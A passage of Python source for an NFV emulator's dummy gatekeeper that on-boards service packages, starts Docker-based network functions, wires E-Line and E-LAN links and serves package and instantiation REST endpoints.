Do all steps to prepare this service to be instantiated
:return:
"""
# 1. extract the contents of the package and store them in our catalog
self._unpack_service_package()
# 2. read in all descriptor files
self._load_package_descriptor()
self._load_nsd()
self._load_vnfd()
if self.nsd is None:
raise OnBoardingException("No NSD found.")
if len(self.vnfds) < 1:
raise OnBoardingException("No VNFDs found.")
# 3. prepare container images (e.g. download or build Dockerfile)
if BUILD_DOCKERFILE:
self._load_docker_files()
self._build_images_from_dockerfiles()
else:
self._load_docker_urls()
self._pull_predefined_dockerimages()
# 4. reserve subnets
eline_fwd_links, elan_fwd_links = self._get_elines_and_elans()
self.eline_subnets = [ELINE_SUBNETS.pop(0) for _ in eline_fwd_links]
self.elan_subnets = [ELAN_SUBNETS.pop(0) for _ in elan_fwd_links]
LOG.debug("Reserved subnets for service '{}': E-Line: {} / E-LAN: {}"
.format(self.manifest.get("name"),
self.eline_subnets, self.elan_subnets))
LOG.info("On-boarded service: {}".format(self.manifest.get("name")))
def start_service(self):
"""
This methods creates and starts a new service instance.
It computes placements, iterates over all VNFDs, and starts
each VNFD as a Docker container in the data center selected
by the placement algorithm.
:return:
"""
LOG.info("Starting service {} ({})"
.format(get_triple_id(self.nsd), self.uuid))
# 1. each service instance gets a new uuid to identify it
instance_uuid = str(uuid.uuid4())
# build a instances dict (a bit like a NSR :))
self.instances[instance_uuid] = dict()
self.instances[instance_uuid]["uuid"] = self.uuid
# SSIID = short service instance ID (to postfix Container names)
self.instances[instance_uuid]["ssiid"] = self._instance_counter
self.instances[instance_uuid]["name"] = get_triple_id(self.nsd)
self.instances[instance_uuid]["vnf_instances"] = list()
self.instances[instance_uuid]["created_at"] = str(datetime.datetime.now())
# increase for next instance
self._instance_counter += 1
# 3. start all vnfds that we have in the service
for vnf_id in self.vnfds:
vnfd = self.vnfds[vnf_id]
# attention: returns a list of started deployment units
vnfis = self._start_vnfd(
vnfd, vnf_id, self.instances[instance_uuid]["ssiid"])
# add list of VNFIs to total VNFI list
self.instances[instance_uuid]["vnf_instances"].extend(vnfis)
# 4. Deploy E-Line, E-Tree and E-LAN links
# Attention: Only done if ""forwarding_graphs" section in NSD exists,
# even if "forwarding_graphs" are not used directly.
# Attention2: Do a copy of *_subnets with list() is important here!
eline_fwd_links, elan_fwd_links = self._get_elines_and_elans()
# 5a. deploy E-Line links
GK.net.deployed_elines.extend(eline_fwd_links) # bookkeeping
self._connect_elines(eline_fwd_links, instance_uuid, list(self.eline_subnets))
# 5b. deploy E-Tree/E-LAN links
GK.net.deployed_elans.extend(elan_fwd_links) # bookkeeping
self._connect_elans(elan_fwd_links, instance_uuid, list(self.elan_subnets))
# 6. run the emulator specific entrypoint scripts in the VNFIs of this
# service instance
self._trigger_emulator_start_scripts_in_vnfis(
self.instances[instance_uuid]["vnf_instances"])
# done
LOG.info("Service '{}' started. Instance id: {} SSIID: {}"
.format(self.instances[instance_uuid]["name"],
instance_uuid,
self.instances[instance_uuid]["ssiid"]))
return instance_uuid
def stop_service(self, instance_uuid):
"""
This method stops a running service instance.
It iterates over all VNF instances, stopping them each
and removing them from their data center.
:param instance_uuid: the uuid of the service instance to be stopped
"""
LOG.info("Stopping service %r" % self.uuid)
# get relevant information
# instance_uuid = str(self.uuid.uuid4())
vnf_instances = self.instances[instance_uuid]["vnf_instances"]
# trigger stop skripts in vnf instances and wait a few seconds for
# completion
self._trigger_emulator_stop_scripts_in_vnfis(vnf_instances)
time.sleep(VNF_STOP_WAIT_TIME)
# stop all vnfs
for v in vnf_instances:
self._stop_vnfi(v)
# last step: remove the instance from the list of all instances
del self.instances[instance_uuid]
def _get_elines_and_elans(self):
"""
Get the E-Line, E-LAN, E-Tree links from the NSD.
"""
# Attention: Only done if ""forwarding_graphs" section in NSD exists,
# even if "forwarding_graphs" are not used directly.
eline_fwd_links = list()
elan_fwd_links = list()
if "virtual_links" in self.nsd and "forwarding_graphs" in self.nsd:
vlinks = self.nsd["virtual_links"]
# constituent virtual links are not checked
eline_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-Line")]
elan_fwd_links = [l for l in vlinks if (
l["connectivity_type"] == "E-LAN" or
l["connectivity_type"] == "E-Tree")] # Treat E-Tree as E-LAN
return eline_fwd_links, elan_fwd_links
def _get_resource_limits(self, deployment_unit):
"""
Extract resource limits from deployment units.
"""
# defaults
cpu_list = None
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(float(1.0))
mem_limit = None
# update from descriptor
if "resource_requirements" in deployment_unit:
res_req = deployment_unit.get("resource_requirements")
cpu_list = res_req.get("cpu").get("cpuset")
if cpu_list is None:
cpu_list = res_req.get("cpu").get("vcpus")
if cpu_list is not None:
# attention: docker expects list as string w/o spaces:
cpu_list = str(cpu_list).replace(" ", "").strip()
cpu_bw = res_req.get("cpu").get("cpu_bw")
if cpu_bw is None:
cpu_bw = 1.0
cpu_period, cpu_quota = self._calculate_cpu_cfs_values(float(cpu_bw))
mem_limit = res_req.get("memory").get("size")
mem_unit = str(res_req.get("memory").get("size_unit", "GB"))
if mem_limit is not None:
mem_limit = int(mem_limit)
# to bytes
if "G" in mem_unit:
mem_limit = mem_limit * 1024 * 1024 * 1024
elif "M" in mem_unit:
mem_limit = mem_limit * 1024 * 1024
elif "K" in mem_unit:
mem_limit = mem_limit * 1024
return cpu_list, cpu_period, cpu_quota, mem_limit
def _start_vnfd(self, vnfd, vnf_id, ssiid, **kwargs):
"""
Start a single VNFD of this service
:param vnfd: vnfd descriptor dict
:param vnf_id: unique id of this vnf in the nsd
:return:
"""
vnfis = list()
# the vnf_name refers to the container image to be deployed
vnf_name = vnfd.get("name")
# combine VDUs and CDUs
deployment_units = (vnfd.get("virtual_deployment_units", []) +
vnfd.get("cloudnative_deployment_units", []))
# iterate over all deployment units within each VNFDs
for u in deployment_units:
# 0. vnf_container_name = vnf_id.vdu_id
vnf_container_name = get_container_name(vnf_id, u.get("id"))
vnf_container_instance_name = get_container_name(vnf_id, u.get("id"), ssiid)
# 1. get the name of the docker image to star
if vnf_container_name not in self.remote_docker_image_urls:
raise Exception("No image name for %r found. Abort." % vnf_container_name)
docker_image_name = self.remote_docker_image_urls.get(vnf_container_name)
# 2. select datacenter to start the VNF in
target_dc = self._place(vnfd, vnf_id, u, ssiid)
# 3. perform some checks to ensure we can start the container
assert(docker_image_name is not None)
assert(target_dc is not None)
if not self._check_docker_image_exists(docker_image_name):
raise Exception("Docker image {} not found. Abort."
.format(docker_image_name))
# 4. get the resource limits
cpu_list, cpu_period, cpu_quota, mem_limit = self._get_resource_limits(u)
# get connection points defined for the DU
intfs = u.get("connection_points", [])
# do some re-naming of fields to be compatible to containernet
for i in intfs:
if i.get("address"):
LOG.info("Found static address for {}: {}"
.format(i.get("id"), i.get("address")))
i["ip"] = i.get("address")
# get ports and port_bindings from the port and publish fields of CNFD
# see: https://github.com/containernet/containernet/wiki/Exposing-and-mapping-network-ports
ports = list() # Containernet naming
port_bindings = dict()
for i in intfs:
if i.get("port"): # field with a single port
if not isinstance(i.get("port"), int):
LOG.info("Field 'port' is no int CP: {}".format(i))
else:
ports.append(i.get("port")) # collect all ports
if i.get("ports"): # list with multiple ports
if not isinstance(i.get("ports"), list):
LOG.info("Field 'port' is no list CP: {}".format(i))
else:
for p in i.get("ports"):
if not isinstance(p, int):
# do some parsing
try:
if "/udp" in p:
p = tuple(p.split("/"))
else:
p = int(p)
ports.append(p) # collect all ports
except BaseException as ex:
LOG.error(
"Could not parse ports list: {}".format(p))
LOG.error(ex)
else:
ports.append(p) # collect all ports
if i.get("publish"):
if not isinstance(i.get("publish"), dict):
LOG.info("Field 'publish' is no dict CP: {}".format(i))
else:
port_bindings.update(i.get("publish"))
# update port mapping for cases where service is deployed > 1 times
port_bindings = update_port_mapping_multi_instance(ssiid, port_bindings)
if len(ports) > 0:
LOG.info("{} exposes ports: {}".format(vnf_container_instance_name, ports))
if len(port_bindings) > 0:
LOG.info("{} publishes ports: {}".format(vnf_container_instance_name, port_bindings))
# 5. collect additional information to start container
volumes = list()
cenv = dict()
# 5.1 inject descriptor based start/stop commands into env (overwrite)
VNFD_CMD_START = u.get("vm_cmd_start")
VNFD_CMD_STOP = u.get("vm_cmd_stop")
if VNFD_CMD_START and not VNFD_CMD_START == "None":
LOG.info("Found 'vm_cmd_start'='{}' in VNFD.".format(VNFD_CMD_START) +
" Overwriting SON_EMU_CMD.")
cenv["SON_EMU_CMD"] = VNFD_CMD_START
if VNFD_CMD_STOP and not VNFD_CMD_STOP == "None":
LOG.info("Found 'vm_cmd_start'='{}' in VNFD.".format(VNFD_CMD_STOP) +
" Overwriting SON_EMU_CMD_STOP.")
cenv["SON_EMU_CMD_STOP"] = VNFD_CMD_STOP
# 5.2 inject per instance configurations based on envs
conf_envs = self._load_instance_conf_envs(vnf_container_instance_name)
cenv.update(conf_envs)
# 5.3 handle optional ipc_mode setting
ipc_mode = u.get("ipc_mode", None)
# 5.4 handle optional devices setting
devices = u.get("devices", [])
# 5.5 handle optional cap_add setting
cap_add = u.get("cap_add", [])
# 6. Start the container
LOG.info("Starting %r as %r in DC %r" %
(vnf_name, vnf_container_instance_name, target_dc))
LOG.debug("Interfaces for %r: %r" % (vnf_id, intfs))
# start the container
vnfi = target_dc.startCompute(
vnf_container_instance_name,
network=intfs,
image=docker_image_name,
cpu_quota=cpu_quota,
cpu_period=cpu_period,
cpuset_cpus=cpu_list,
mem_limit=mem_limit,
volumes=volumes,
properties=cenv, # environment
ports=ports,
port_bindings=port_bindings,
# only publish if explicitly stated in descriptor
publish_all_ports=False,
ipc_mode=ipc_mode,
devices=devices,
cap_add=cap_add,
type=kwargs.get('type', 'docker'))
# add vnfd reference to vnfi
vnfi.vnfd = vnfd
# add container name
vnfi.vnf_container_name = vnf_container_name
vnfi.vnf_container_instance_name = vnf_container_instance_name
vnfi.ssiid = ssiid
# store vnfi
vnfis.append(vnfi)
return vnfis
def _stop_vnfi(self, vnfi):
"""
Stop a VNF instance.
:param vnfi: vnf instance to be stopped
"""
# Find the correct datacenter
status = vnfi.getStatus()
dc = vnfi.datacenter
# stop the vnfi
LOG.info("Stopping the vnf instance contained in %r in DC %r" %
(status["name"], dc))
dc.stopCompute(status["name"])
def _get_vnf_instance(self, instance_uuid, vnf_id):
"""
Returns VNFI object for a given "vnf_id" or "vnf_container_name" taken from an NSD.
:return: single object
"""
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if str(vnfi.name) == str(vnf_id):
return vnfi
LOG.warning("No container with name: {0} found.".format(vnf_id))
return None
def _get_vnf_instance_units(self, instance_uuid, vnf_id):
"""
Returns a list of VNFI objects (all deployment units) for a given
"vnf_id" taken from an NSD.
:return: list
"""
if vnf_id is None:
return None
r = list()
for vnfi in self.instances[instance_uuid]["vnf_instances"]:
if vnf_id in vnfi.name:
r.append(vnfi)
if len(r) > 0:
LOG.debug("Found units: {} for vnf_id: {}"
.format([i.name for i in r], vnf_id))
return r
LOG.warning("No container(s) with name: {0} found.".format(vnf_id))
return None
@staticmethod
def _vnf_reconfigure_network(vnfi, if_name, net_str=None, new_name=None):
"""
Reconfigure the network configuration of a specific interface
of a running container.
:param vnfi: container instance
:param if_name: interface name
:param net_str: network configuration string, e.g., 1.2.3.4/24
:return:
"""
# assign new ip address
if net_str is not None:
intf = vnfi.intf(intf=if_name)
if intf is not None:
intf.setIP(net_str)
LOG.debug("Reconfigured network of %s:%s to %r" %
(vnfi.name, if_name, net_str))
else:
LOG.warning("Interface not found: %s:%s. Network reconfiguration skipped." % (
vnfi.name, if_name))
if new_name is not None:
vnfi.cmd('ip link set', if_name, 'down')
vnfi.cmd('ip link set', if_name, 'name', new_name)
vnfi.cmd('ip link set', new_name, 'up')
LOG.debug("Reconfigured interface name of %s:%s to %s" %
(vnfi.name, if_name, new_name))
def _trigger_emulator_start_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD" or var == "VIM_EMU_CMD":
LOG.info("Executing script in '{}': {}={}"
.format(vnfi.name, var, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
break # only execute one command
def _trigger_emulator_stop_scripts_in_vnfis(self, vnfi_list):
for vnfi in vnfi_list:
config = vnfi.dcinfo.get("Config", dict())
env = config.get("Env", list())
for env_var in env:
var, cmd = map(str.strip, map(str, env_var.split('=', 1)))
if var == "SON_EMU_CMD_STOP" or var == "VIM_EMU_CMD_STOP":
LOG.info("Executing script in '{}': {}={}"
.format(vnfi.name, var, cmd))
# execute command in new thread to ensure that GK is not
# blocked by VNF
t = threading.Thread(target=vnfi.cmdPrint, args=(cmd,))
t.daemon = True
t.start()
break # only execute one command
def _load_instance_conf_envs(self, cname):
"""
Try to load an instance-specific env file. If not found,
just return an empty dict.
"""
if PER_INSTANCE_ENV_CONFIGURATION_FOLDER is None:
return dict()
try:
path = os.path.expanduser(PER_INSTANCE_ENV_CONFIGURATION_FOLDER)
path = os.path.join(path, "{}.env.yml".format(cname))
res = load_yaml(path)
LOG.info("Loaded instance-specific env file for '{}': {}"
.format(cname, res))
return res
except BaseException as ex:
LOG.info("No instance-specific env file found for: {}"
.format(cname))
del ex
return dict()
def _unpack_service_package(self):
"""
unzip *.son file and store contents in CATALOG_FOLDER/services/<service_uuid>/
"""
LOG.info("Unzipping: %r" % self.package_file_path)
with zipfile.ZipFile(self.package_file_path, "r") as z:
z.extractall(self.package_content_path)
def _load_package_descriptor(self):
"""
Load the main package descriptor YAML and keep it as dict.
:return:
"""
self.manifest = load_yaml(
os.path.join(
self.package_content_path, "TOSCA-Metadata/NAPD.yaml"))
def _load_nsd(self):
"""
Load the entry NSD YAML and keep it as dict.
:return:
"""
if "package_content" in self.manifest:
nsd_path = None
for f in self.manifest.get("package_content"):
if f.get("content-type") == "application/vnd.5gtango.nsd":
nsd_path = os.path.join(
self.package_content_path,
make_relative_path(f.get("source")))
break # always use the first NSD for now
if nsd_path is None:
raise OnBoardingException("No NSD with type 'application/vnd.5gtango.nsd' found.")
self.nsd = load_yaml(nsd_path)
GK.net.deployed_nsds.append(self.nsd) # TODO this seems strange (remove?)
LOG.debug("Loaded NSD: %r" % self.nsd.get("name"))
else:
raise OnBoardingException(
"No 'package_content' section in package manifest:\n{}"
.format(self.manifest))
def _load_vnfd(self):
"""
Load all VNFD YAML files referenced in MANIFEST.MF and keep them in dict.
:return:
"""
# first make a list of all the vnfds in the package
vnfd_set = dict()
if "package_content" in self.manifest:
for pc in self.manifest.get("package_content"):
if pc.get(
"content-type") == "application/vnd.5gtango.vnfd":
vnfd_path = os.path.join(
self.package_content_path,
make_relative_path(pc.get("source")))
vnfd = load_yaml(vnfd_path)
vnfd_set[vnfd.get("name")] = vnfd
if len(vnfd_set) < 1:
raise OnBoardingException("No VNFDs found.")
# then link each vnf_id in the nsd to its vnfd
for v in self.nsd.get("network_functions"):
if v.get("vnf_name") in vnfd_set:
self.vnfds[v.get("vnf_id")] = vnfd_set[v.get("vnf_name")]
LOG.debug("Loaded VNFD: {0} id: {1}"
.format(v.get("vnf_name"), v.get("vnf_id")))
def _connect_elines(self, eline_fwd_links, instance_uuid, subnets):
"""
Connect all E-LINE links in the NSD
Attention: This method DOES NOT support multi V/CDU VNFs!
:param eline_fwd_links: list of E-LINE links in the NSD
:param: instance_uuid of the service
:param: subnets list of subnets to be used
:return:
"""
# cookie is used as identifier for the flowrules installed by the dummygatekeeper
# eg. different services get a unique cookie for their flowrules
cookie = 1
for link in eline_fwd_links:
LOG.info("Found E-Line: {}".format(link))
src_id, src_if_name = parse_interface(
link["connection_points_reference"][0])
dst_id, dst_if_name = parse_interface(
link["connection_points_reference"][1])
LOG.info("Searching C/VDU for E-Line: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
# handle C/VDUs (ugly hack, only one V/CDU per VNF for now)
src_units = self._get_vnf_instance_units(instance_uuid, src_id)
dst_units = self._get_vnf_instance_units(instance_uuid, dst_id)
if src_units is None or dst_units is None:
LOG.info("No VNF-VNF link. Skipping: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
return
# we only support VNFs with one V/CDU right now
if len(src_units) != 1 or len(dst_units) != 1:
raise BaseException("LLCM does not support E-LINES for multi V/CDU VNFs.")
# get the full name from that C/VDU and use it as src_id and dst_id
src_id = src_units[0].name
dst_id = dst_units[0].name
# from here we have all info we need
LOG.info("Creating E-Line for C/VDU: src={}, src_if={}, dst={}, dst_if={}"
.format(src_id, src_if_name, dst_id, dst_if_name))
# get involved vnfis
src_vnfi = src_units[0]
dst_vnfi = dst_units[0]
# proceed with chaining setup
setChaining = False
if src_vnfi is not None and dst_vnfi is not None:
setChaining = True
# re-configure the VNFs IP assignment and ensure that a new
# subnet is used for each E-Link
eline_net = subnets.pop(0)
ip1 = "{0}/{1}".format(str(eline_net[1]),
eline_net.prefixlen)
ip2 = "{0}/{1}".format(str(eline_net[2]),
eline_net.prefixlen)
# check if VNFs have fixed IPs (ip/address field in VNFDs)
if (self._get_vnfd_cp_from_vnfi(
src_vnfi, src_if_name).get("ip") is None and
self._get_vnfd_cp_from_vnfi(
src_vnfi, src_if_name).get("address") is None):
self._vnf_reconfigure_network(src_vnfi, src_if_name, ip1)
# check if VNFs have fixed IPs (ip field in VNFDs)
if (self._get_vnfd_cp_from_vnfi(
dst_vnfi, dst_if_name).get("ip") is None and
self._get_vnfd_cp_from_vnfi(
dst_vnfi, dst_if_name).get("address") is None):
self._vnf_reconfigure_network(dst_vnfi, dst_if_name, ip2)
# set the chaining
if setChaining:
GK.net.setChain(
src_id, dst_id,
vnf_src_interface=src_if_name, vnf_dst_interface=dst_if_name,
bidirectional=BIDIRECTIONAL_CHAIN, cmd="add-flow", cookie=cookie, priority=10)
def _get_vnfd_cp_from_vnfi(self, vnfi, ifname):
"""
Gets the connection point data structure from the VNFD
of the given VNFI using ifname.
"""
if vnfi.vnfd is None:
return {}
cps = vnfi.vnfd.get("connection_points")
for cp in cps:
if cp.get("id") == ifname:
return cp
def _connect_elans(self, elan_fwd_links, instance_uuid, subnets):
"""
Connect all E-LAN/E-Tree links in the NSD
This method supports multi-V/CDU VNFs if the connection
point names of the DUs are the same as the ones in the NSD.
:param elan_fwd_links: list of E-LAN links in the NSD
:param: instance_uuid of the service
:param: subnets list of subnets to be used
:return:
"""
for link in elan_fwd_links:
# a new E-LAN/E-Tree
elan_vnf_list = []
lan_net = subnets.pop(0)
lan_hosts = list(lan_net.hosts())
# generate lan ip address for all interfaces (of all involved (V/CDUs))
for intf_ref in link["connection_points_reference"]:
vnf_id, intf_name = parse_interface(intf_ref)
if vnf_id is None:
continue # skip references to NS connection points
units = self._get_vnf_instance_units(instance_uuid, vnf_id)
if units is None:
continue # skip if no deployment unit is present
# iterate over all involved deployment units
for uvnfi in units:
# Attention: we apply a simplification for multi DU VNFs here:
# the connection points of all involved DUs have to have the same
# name as the connection points of the surrounding VNF to be mapped.
# This is because we do not consider links specified in the VNFDs
container_name = uvnfi.name
ip_address = None
# get the interface of the unit
intf = self._get_vnfd_cp_from_vnfi(uvnfi, intf_name)
# check if there is a manually assigned address
if intf is not None:
if intf.get("address"):
ip_address = intf.get("address")
if ip_address is None:
# automatically asign an IP from our pool
ip_address = "{0}/{1}".format(str(lan_hosts.pop(0)),
lan_net.prefixlen)
LOG.debug(
"Setting up E-LAN/E-Tree interface. (%s:%s) -> %s" % (
container_name, intf_name, ip_address))
# re-configure the VNFs IP assignment and ensure that a new subnet is used for each E-LAN
# E-LAN relies on the learning switch capability of Ryu which has to be turned on in the topology
# (DCNetwork(controller=RemoteController, enable_learning=True)), so no explicit chaining is
# necessary.
vnfi = self._get_vnf_instance(instance_uuid, container_name)
if vnfi is not None:
self._vnf_reconfigure_network(vnfi, intf_name, ip_address)
# add this vnf and interface to the E-LAN for tagging
elan_vnf_list.append(
{'name': container_name, 'interface': intf_name})
# install the VLAN tags for this E-LAN
GK.net.setLAN(elan_vnf_list)
def _load_docker_files(self):
"""
Get all paths to Dockerfiles from VNFDs and store them in dict.
:return:
"""
for vnf_id, v in self.vnfds.iteritems():
for vu in v.get("virtual_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, vu.get("id"))
if vu.get("vm_image_format") == "docker":
vm_image = vu.get("vm_image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(vm_image))
self.local_docker_files[vnf_container_name] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (vnf_container_name, docker_path))
for cu in v.get("cloudnative_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, cu.get("id"))
image = cu.get("image")
docker_path = os.path.join(
self.package_content_path,
make_relative_path(image))
self.local_docker_files[vnf_container_name] = docker_path
LOG.debug("Found Dockerfile (%r): %r" % (vnf_container_name, docker_path))
def _load_docker_urls(self):
"""
Get all URLs to pre-build docker images in some repo.
:return:
"""
for vnf_id, v in list(self.vnfds.items()):
for vu in v.get("virtual_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, vu.get("id"))
if vu.get("vm_image_format") == "docker":
url = vu.get("vm_image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[vnf_container_name] = url
LOG.debug("Found Docker image URL (%r): %r" %
(vnf_container_name,
self.remote_docker_image_urls[vnf_container_name]))
for cu in v.get("cloudnative_deployment_units", []):
vnf_container_name = get_container_name(vnf_id, cu.get("id"))
url = cu.get("image")
if url is not None:
url = url.replace("http://", "")
self.remote_docker_image_urls[vnf_container_name] = url
LOG.debug("Found Docker image URL (%r): %r" %
(vnf_container_name,
self.remote_docker_image_urls[vnf_container_name]))
def _build_images_from_dockerfiles(self):
"""
Build Docker images for each local Dockerfile found in the package: self.local_docker_files
"""
if GK_STANDALONE_MODE:
return # do not build anything in standalone mode
dc = DockerClient()
LOG.info("Building %d Docker images (this may take several minutes) ..." % len(
self.local_docker_files))
for k, v in list(self.local_docker_files.items()):
for line in dc.build(path=v.replace(
"Dockerfile", ""), tag=k, rm=False, nocache=False):
LOG.debug("DOCKER BUILD: %s" % line)
LOG.info("Docker image created: %s" % k)
def _pull_predefined_dockerimages(self):
"""
If the package contains URLs to pre-build Docker images, we download them with this method.
"""
dc = DockerClient()
for url in list(self.remote_docker_image_urls.values()):
# only pull if not present (speedup for development)
if not FORCE_PULL:
if len(dc.images.list(name=url)) > 0:
LOG.debug("Image %r present. Skipping pull." % url)
continue
LOG.info("Pulling image: %r" % url)
# this seems to fail with latest docker api version 2.0.2
# dc.images.pull(url,
# insecure_registry=True)
# using docker cli instead
cmd = ["docker",
"pull",
url,
]
Popen(cmd).wait()
def _check_docker_image_exists(self, image_name):
"""
Query the docker service and check if the given image exists
:param image_name: name of the docker image
:return:
"""
return len(DockerClient().images.list(name=image_name)) > 0
def _place(self, vnfd, vnfid, vdu, ssiid):
"""
Do placement. Return the name of the DC to place
the given VDU.
"""
assert(len(self.vnfds) > 0)
assert(len(GK.dcs) > 0)
if PLACEMENT_ALGORITHM_OBJ is None:
LOG.error("No placement algorithm given. Using FirstDcPlacement!")
p = FirstDcPlacement()
else:
p = PLACEMENT_ALGORITHM_OBJ
cname = get_container_name(vnfid, vdu.get("id"), ssiid)
rdc = p.place(GK.dcs, vnfd, vnfid, vdu, ssiid, cname)
LOG.info("Placement: '{}' --> '{}'".format(cname, rdc))
return rdc
def _calculate_cpu_cfs_values(self, cpu_time_percentage):
"""
Calculate cpu period and quota for CFS
:param cpu_time_percentage: percentage of overall CPU to be used
:return: cpu_period, cpu_quota
"""
if cpu_time_percentage is None:
return -1, -1
if cpu_time_percentage < 0:
return -1, -1
# (see: https://www.kernel.org/doc/Documentation/scheduler/sched-bwc.txt)
# Attention minimum cpu_quota is 1ms (micro)
cpu_period = 1000000 # lets consider a fixed period of 1000000 microseconds for now
LOG.debug("cpu_period is %r, cpu_percentage is %r" %
(cpu_period, cpu_time_percentage))
# calculate the fraction of cpu time for this container
cpu_quota = cpu_period * cpu_time_percentage
# ATTENTION >= 1000 to avoid a invalid argument system error ... no
# idea why
if cpu_quota < 1000:
LOG.debug("cpu_quota before correcting: %r" % cpu_quota)
cpu_quota = 1000
LOG.warning("Increased CPU quota to avoid system error.")
LOG.debug("Calculated: cpu_period=%f / cpu_quota=%f" %
(cpu_period, cpu_quota))
return int(cpu_period), int(cpu_quota)
"""
Some (simple) placement algorithms
"""
class FirstDcPlacement(object):
"""
Placement: Always use one and the same data center from the GK.dcs dict.
"""
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
return list(dcs.values())[0]
class RoundRobinDcPlacement(object):
"""
Placement: Distribute VNFs across all available DCs in a round robin fashion.
"""
def __init__(self):
self.count = 0
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
dcs_list = list(dcs.values())
rdc = dcs_list[self.count % len(dcs_list)]
self.count += 1 # inc. count to use next DC
return rdc
class StaticConfigPlacement(object):
"""
Placement: Fixed assignment based on config file.
"""
def __init__(self, path=None):
if path is None:
path = "static_placement.yml"
path = os.path.expanduser(path)
self.static_placement = dict()
try:
self.static_placement = load_yaml(path)
except BaseException as ex:
LOG.error(ex)
LOG.error("Couldn't load placement from {}"
.format(path))
LOG.info("Loaded static placement: {}"
.format(self.static_placement))
def place(self, dcs, vnfd, vnfid, vdu, ssiid, cname):
# check for container name entry
if cname not in self.static_placement:
LOG.error("Coudn't find {} in placement".format(cname))
LOG.error("Using first DC as fallback!")
return list(dcs.values())[0]
# lookup
candidate_dc = self.static_placement.get(cname)
# check if DC exsits
if candidate_dc not in dcs:
LOG.error("Coudn't find DC {}".format(candidate_dc))
LOG.error("Using first DC as fallback!")
return list(dcs.values())[0]
# return correct DC
return dcs.get(candidate_dc)
"""
Resource definitions and API endpoints
"""
class Packages(fr.Resource):
def post(self):
"""
Upload a *.son service package to the dummy gatekeeper.
We expect request with a *.son file and store it in UPLOAD_FOLDER
:return: UUID
"""
try:
# get file contents
LOG.info("POST /packages called")
# lets search for the package in the request
is_file_object = False # make API more robust: file can be in data or in files field
if "package" in request.files:
son_file = request.files["package"]
is_file_object = True
elif len(request.data) > 0:
son_file = request.data
else:
return {"service_uuid": None, "size": 0, "sha1": None,
"error": "upload failed. file not found."}, 500
# generate a uuid to reference this package
service_uuid = str(uuid.uuid4())
file_hash = str(son_file)
file_hash = hashlib.sha1(file_hash.encode())
file_hash = file_hash.hexdigest()
# ensure that upload folder exists
ensure_dir(UPLOAD_FOLDER)
upload_path = os.path.\
join(UPLOAD_FOLDER, "%s.tgo" % service_uuid)
# store *.son file to disk
if is_file_object:
son_file.save(upload_path)
else:
with open(upload_path, 'wb') as f:
f.write(son_file)
size = os.path.getsize(upload_path)
# first stop and delete any other running services
if AUTO_DELETE:
service_list = copy.copy(GK.services)
for service_uuid in service_list:
instances_list = copy.copy(
GK.services[service_uuid].instances)
for instance_uuid in instances_list:
# valid service and instance UUID, stop service
GK.services.get(service_uuid).stop_service(
instance_uuid)
LOG.info("service instance with uuid %r stopped." %
instance_uuid)
# create a service object and register it
s = Service(service_uuid, file_hash, upload_path)
GK.register_service_package(service_uuid, s)
# automatically deploy the service
if AUTO_DEPLOY:
# ok, we have a service uuid, lets start the service
reset_subnets()
GK.services.get(service_uuid).start_service()
# generate the JSON result
return {"service_uuid": service_uuid, "size": size,
"sha1": file_hash, "error": None}, 201
except BaseException:
LOG.exception("Service package upload failed:")
return {"service_uuid": None, "size": 0,
"sha1": None, "error": "upload failed"}, 500
def get(self):
"""
Return a list of package descriptor headers.
Fakes the behavior of 5GTANGO's GK API to be
compatible with tng-cli.
:return: list
"""
LOG.info("GET /packages")
result = list()
for suuid, sobj in GK.services.items():
pkg = dict()
pkg["pd"] = dict()
pkg["uuid"] = suuid
pkg["pd"]["name"] = sobj.manifest.get("name")
pkg["pd"]["version"] = sobj.manifest.get("version")
pkg["created_at"] = sobj.created_at
result.append(pkg)
return result, 200, CORS_HEADER
class Services(fr.Resource):
def get(self):
"""
Return a list of services.
Fakes the behavior of 5GTANGO's GK API to be
compatible with tng-cli.
:return: list
"""
LOG.info("GET /services")
result = list()
for suuid, sobj in GK.services.items():
service = dict()
service["nsd"] = dict()
service["uuid"] = suuid
service["nsd"]["name"] = sobj.nsd.get("name")
service["nsd"]["version"] = sobj.nsd.get("version")
service["created_at"] = sobj.created_at
result.append(service)
return result, 200, CORS_HEADER
class Instantiations(fr.Resource):
def post(self):
"""
Instantiate a service specified by its UUID.
Will return a new UUID to identify the running service instance.
:return: UUID
"""
LOG.info("POST /instantiations (or /requests) called")
# try to extract the service uuid from the request
json_data = request.get_json(force=True)
service_uuid = json_data.get("service_uuid")
service_name = json_data.get("service_name")
if service_name is None:
# lets be fuzzy
service_name = service_uuid
# first try to find by service_name
if service_name is not None:
for s_uuid, s in GK.services.items():
if s.manifest.get("name") == service_name:
LOG.info("Searched for: {}. Found service w. UUID: {}"
.format(service_name, s_uuid))
service_uuid = s_uuid
# lets be a bit fuzzy here to make testing easier
if (service_uuid is None or service_uuid ==
"latest") and len(GK.services) > 0:
# if we don't get a service uuid, we simple start the first service
# in the list
service_uuid = list(GK.services.keys())[0]
if service_uuid in GK.services:
# ok, we have a service uuid, lets start the service
service_instance_uuid = GK.services.get(
service_uuid).start_service()
# multiple ID fields to be compatible with tng-bench and tng-cli
return ({"service_instance_uuid": service_instance_uuid,
"id": service_instance_uuid}, 201)
LOG.error("Service not found: {}/{}".format(service_uuid, service_name))
return "Service not found", 404
def get(self):
"""
Returns a list of UUIDs containing all running services.
:return: dict / list
"""
LOG.debug("GET /instantiations or /api/v3/records/services")
